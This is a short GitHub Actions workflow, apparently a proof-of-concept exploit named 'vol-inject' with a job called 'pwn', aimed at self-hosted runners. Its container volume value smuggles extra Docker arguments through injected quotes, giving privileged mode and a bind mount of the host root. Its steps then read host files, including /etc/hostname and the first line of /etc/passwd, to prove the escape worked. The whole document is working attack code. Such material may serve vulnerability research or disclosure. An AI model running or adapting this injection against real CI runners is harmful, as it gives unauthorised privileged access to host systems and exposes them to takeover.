name: vol-inject
on: [workflow_dispatch]

jobs:
  pwn:
    runs-on: self-hosted
    container:
      image: ubuntu:22.04
      volumes:
        - '/tmp/vol\" --privileged --mount type=bind,src=/,dst=/host\"'
    steps:
      - name: prove host access
        run: |
          id
          ls -la /host\\
          cat /host\\/etc/hostname || true
          cat /host\\/etc/resolve.config || true
          head -n 1 /host\\/etc/passwd || true
